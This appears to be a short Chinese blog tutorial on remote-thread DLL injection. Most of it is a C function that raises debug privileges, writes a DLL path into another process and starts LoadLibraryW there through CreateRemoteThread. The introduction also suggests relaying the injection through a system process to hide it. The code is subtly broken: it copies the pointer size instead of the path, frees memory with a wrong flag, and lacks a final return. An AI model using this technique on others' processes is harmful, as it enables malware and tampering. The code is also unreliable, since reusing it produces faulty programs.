注入技术--远程线程注入

1.简介

最经典的注入方式, 容易实现但是监控LoadLibrary系列函数即可

还可以注入中转,如先将模块注入到系统进程中,利用系统进程再次注入到目标进程,然后从系统进程卸载掉模块

 

2.代码

DWORD threadInject(WCHAR* dllpath,DWORD pid)
{
    //先激活权限
    HANDLE hToken;
    LUID newLuid;
    TOKEN_PRIVILEGES tr;
    tr.PrivilegeCount = 1;
    tr.Privileges->Attributes = SE_PRIVILEGE_ENABLED;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &newLuid);
    tr.Privileges->Luid = newLuid;
    AdjustTokenPrivileges(hToken, FALSE, &tr, sizeof(tr), 0, 0);
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, pid);
    //获取进程句柄
    if (hProcess==0||hProcess==INVALID_HANDLE_VALUE)
    {
        CloseHandle(hToken);
        return 0;
    }
    //申请内存存放参数
    LPVOID p = VirtualAllocEx(hProcess, 0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!p)
    {
        CloseHandle(hProcess);
        CloseHandle(hToken);
        return 0;
    }
    //写参数
    if (!WriteProcessMemory(hProcess, p, (LPVOID)(dllpath), sizeof(dllpath), NULL))
    {
        VirtualFreeEx(hProcess, p, 0x1000, MEM_FREE);
        CloseHandle(hProcess);
        CloseHandle(hToken);
        return 0;
    }
    //创建远程线程并执行LoadLibraryW加载dll
    HANDLE cThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW")), p, 0, 0);
    if (cThread==0||cThread==INVALID_HANDLE_VALUE)
    {
        VirtualFreeEx(hProcess, p, 0x1000, MEM_FREE);
        CloseHandle(hProcess);
        CloseHandle(hToken);
        return 0;
    }
    CloseHandle(cThread);
    CloseHandle(hProcess);
    CloseHandle(hToken);

}